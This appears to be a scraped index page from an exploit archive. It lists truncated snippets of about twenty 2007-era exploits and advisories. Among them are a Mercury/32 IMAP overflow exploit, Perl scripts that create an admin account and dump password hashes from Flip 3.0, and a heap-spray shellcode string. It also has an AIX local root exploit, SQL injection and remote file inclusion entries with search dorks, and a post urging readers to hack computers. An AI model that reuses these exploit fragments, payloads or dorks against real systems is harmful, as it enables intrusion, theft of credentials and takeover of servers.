mercury-overflow.txt

Z:\ExpmercurySEARCH.pl 127.0.0.1 143 void ph4nt0m.org Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit Found & Code by void ph4nt0m.org S: OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready. C: pst06 LOGIN void ph4nt0m.org S: pst06 OK LOGIN completed. C: pst06...

flip30-create.txt

!/usr/bin/perl use strict; use IO::Socket; use Getopt::Std; my $app = "Flip ; print "password you want: "; my $pass = ; chomp$user; chomp$pass; createadmin$url, $user, $pass; sub createadmin my $url = shift; my $user = shift; my $pass = shift; print "creating admin ... \t"; my $content =...

flip30-pass.txt

!/usr/bin/perl use strict; use IO::Socket; my $app = "Flip = 0; $data = substr$data, $index1+4; $index1 = 0; printf "%-20s %-32s\n", "username", "md5 hash"; while$index1 = index$data, "\n" = 0 my $hash = substr$data, 0, 32; my $index2 = index$data, ""; my $index3 = index$data, "", $index2+2; my...

X-Cart - Multiple Remote File Inclusions

xCart Remote file inclusion Download script : http://www.x-cart.com// Discovered By : aLiiF a.k.a arif @debuteam 07/09/2007 HomePage : http://www.debuteam.net// Thx to : Debu Newbie Payment Yogac nyubi Rozi ^S0ng0ku^ Kuris Sonix Toxicity newbi3 R4yn4ld0 DisJocKey s3ng0k homeedition Holong...

globallink-overflow.txt

document.write""; var heapSprayToAddress = 0x0c0c0c0c; var shellcode = unescape "%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + // exec calc "%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%uf513" + "%ue2ce%u8369%ufceb%uf4e2%u2609%u69a6%ucef5%u2c69" +...

Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities

source: https://www.securityfocus.com/bid/25529/info Move Media Player is prone to multiple remote buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied data before copying it into insufficiently sized memory buffers. Exploiting these issues allows...

DSquare Exploit Pack: D2SEC_JINITIATOR

Name| d2secjinitiator ---|--- CVE| CVE-2007-4467 Exploit Pack| D2ExploitPack Description| Oracle JInitiator ActiveX Buffer Overflow Notes|...

How to write a remote overflow EXPLOIT Linux-vulnerability warning-the black bar safety net

Translator's note: presumably a lot of Friends of buffer overflow very much aware, the Internet also has a lot about the windows buffer overflow exploits tutorial I also wrote several articles on. But under linux the complete overflow tutorials I haven't seen maybe is my eye clumsy. Today in...

RFI ====> vBulletin v3.6.5

By Hasadya Raed Contact : [email protected] - Israel Greetz : -Fairoz- ----------------------------------- vBulletin v3.6.5 Dork : "Powered by vBulletin v3.6.5. Copyright ©2000 - 2007 " ----------------------------------- Exploits :...

aix53-ftp.txt

/ 07/2007: public release qaaz@aix:$ ./aix-ftp ---------------------------- AIX ftp Local Root Exploit By qaaz ---------------------------- bash: no job control in this shell bash-3.00 / include include include include include include define TARGET "/usr/bin/ftp" define OVERLEN 300 define MAXx,y ...

clever-overwrite.txt

------------------------------------------------------------------------------------------------- Clever Internet ActiveX Suite 6.2 CLINETSUITEX6.OCX Arbitrary file download/overwrite Exploit url: http://www.clevercomponents.com/home/news.asp author: shinnai mail: shinnaiatautisticidotorg site:...

[Full-disclosure] WabiSabiLabi exploit attached

Attached and in-line is an exploit for a newly announced item on the WabiSabiLabi auction block. I hope this completely devalues the item so that the original finder dies of starvation. DON'T SELL BUGS THROUGH WABISABILABLA USE EXPLOITS TO HACK COMPUTERS INSTEAD Exploit is for a stack overflow in...

bwired (index.php newsID) Remote SQL Injection Vulnerability

No description provided by source. / \ / \ | | | | | | | | | | | / | | | | | | | ' / | | ' \ / \ | | | | || | || | | | \ | | | | / | , |/ /|| ||| |||| / | |/ Program Title bwired - Remote SQL Injection Note...

Expert Advisior - 'index.php?id' SQL Injection

--==+================================================================================+==-- --==+ Expert Advisior SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: N/A DORK: intitle:"Answer...

TBDev.NET DR - TakeProfEdit.php HTML Injection

TBDev.NET DR - TakeProfEdit.php HTML Injection source: https://www.securityfocus.com/bid/24923/info TBDev.NET DR is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting this issue may allow an attacker to execute HTML and script...

FlashBB Sendmsg.PHP远程文件包含漏洞

FlashBB是一款基于PHP的论坛程序。 FlashBB不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'Sendmsg.PHP'脚本对用户提交的'phpbbrootpath'参数缺少过滤，指定远程服务器上的PHP文件作为包含对象，可导致以WEB进程权限执行任意命令。 TUFaT FlashBB 1.1.7 目前没有解决方案提供 http://www.sebug.net/show-exp-2121.html...

PHP Director Videos.PHP SQL注入漏洞

PHP Director是一款基于PHP的WEB应用程序。 PHP Director不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。 问题是由于'Videos.PHP'脚本对用户提交的'id'参数缺少过滤，提交恶意SQL查询作为参数数据，可导致应用程序处理时更改原来的SQL逻辑，攻击者可以获得敏感信息或者操作数据库。 PHPDirector 0.21 目前没有解决方案提供： http://www.phpdirector.co.uk/site/...

Fujitsu ServerView 4.50.8 - DBASCIIAccess Remote Command Execution

source: https://www.securityfocus.com/bid/24762/info Fujitsu ServerView is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data. Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application...

avarcade-sql.txt

Web: AV Arcade 2.1b Site : www.avscripts.net Dork : "Powered By AV Arcade" Author: Kw3rLn tehlostbyteatYaHoOd0tCom Romanian Security Team Ethical Hacking - hTTp://RSTZONE.nET Description: SQL injection in $id of includes/viewpage.php Exploit:...

Pharmacy System Index.PHP SQL注入漏洞

Pharmacy System是一款基于PHP的WEB应用程序。 Pharmacy System不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。 问题是由于'index.php'脚本对用户提交的WEB参数缺少过滤，提交恶意SQL查询作为参数数据，可导致应用程序处理时更改原来的SQL逻辑，攻击者可以获得敏感信息或者操作数据库。 NetArt Media Pharmacy System 2.0 目前没有解决方案提供： http://www.netartmedia.net/pharmacysystem/...